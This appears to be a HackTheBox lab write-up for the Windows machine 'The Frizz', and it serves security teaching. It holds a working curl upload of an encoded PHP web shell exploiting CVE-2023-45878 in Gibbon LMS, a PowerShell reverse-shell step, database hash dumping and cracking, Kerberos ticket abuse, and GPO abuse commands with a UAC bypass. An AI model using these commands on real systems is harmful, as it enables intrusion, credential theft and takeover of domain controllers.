All write-ups
8 min read

HackTheBox: The Frizz Writeup

HackTheBoxWindowsActive DirectoryGibbon LMSKerberosGPO Abuse

HackTheBox: The Frizz

Overview

The Frizz is an Active Directory environment that begins with exploiting a CVE in Gibbon LMS to execute PHP code. Enumeration of the database yields hashes, which after cracking, allow for Kerberos ticket extraction. Finally, manipulating Group Policy Objects (GPO) grants administrative privileges.

Initial Access: Gibbon LMS

The machine hosts a Gibbon LMS instance vulnerable to an authenticated RCE (CVE-2023-45878). The vulnerability lies in an insecure file upload mechanism.

We upload a PHP web shell disguised within an image payload using curl:

curl -v -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Once uploaded, we execute a Base64 encoded PowerShell reverse shell by hitting http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=powershell -e [BASE64_PAYLOAD].

Lateral Movement: Database Extraction

With shell access, we inspect the config.php file and uncover MySQL credentials. Querying the database directly via mysql.exe exposes user hashes and salts:

.\mysql.exe -h localhost -u MrGibbonsDB -p[REDACTED] -D gibbon -e "SELECT username, passwordStrong, passwordStrongSalt FROM gibbonPerson;"

Extracted Data:

Formatting the hash as hash:salt and cracking it with Hashcat (mode 1420 for sha256($pass.$salt)) yields the password: [REDACTED].

Authenticating via Kerberos

To authenticate via SSH to the Windows machine, we generate a Ticket Granting Ticket (TGT). Kerberos requires strict time synchronization.

  1. Disable local NTP and sync with the target:
    sudo systemctl stop ntpsec
    sudo rdate -n 10.10.11.60
    
  2. Configure /etc/krb5.conf:
    [libdefaults]
        default_realm = FRIZZ.HTB
        ...
    [realms]
        FRIZZ.HTB = {
            kdc = frizzdc.frizz.htb
            admin_server = frizzdc.frizz.htb
            default_domain = frizz.htb
        }
    
  3. Request TGT using Impacket:
    getTGT.py frizz.htb/f.frizzle
    
  4. Export ticket and connect via SSH:
    export KRB5CCNAME=f.frizzle.ccache
    ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@frizz.htb
    

Privilege Escalation: GPO Abuse

Enumeration reveals another user, M.Schoolbus, whose password is found in a .7z file in the Recycle Bin. Logging in as M.Schoolbus shows the user holds WriteGPLink permissions over the Class_FRIZZ and DOMAIN CONTROLLERS organizational units.

We weaponize this permission by creating a malicious Group Policy Object (GPO) to add M.Schoolbus to the local Administrators group.

# Create a new GPO
New-GPO -Name "MaliciousGPO"

# Link GPO to Domain Controllers OU
New-GPLink -Name "MaliciousGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"

# Inject LocalAdmin via SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName MaliciousGPO

# Force GP update
gpupdate /force

With administrative privileges granted, we use RunasCs.exe to spawn a high-integrity shell or directly read the root flag:

.\RunasCs.exe "M.SchoolBus" "[REDACTED]" "cmd /c type C:\Users\Administrator\Desktop\root.txt" --bypass-uac --logon-type '8' --force-profile

System fully compromised.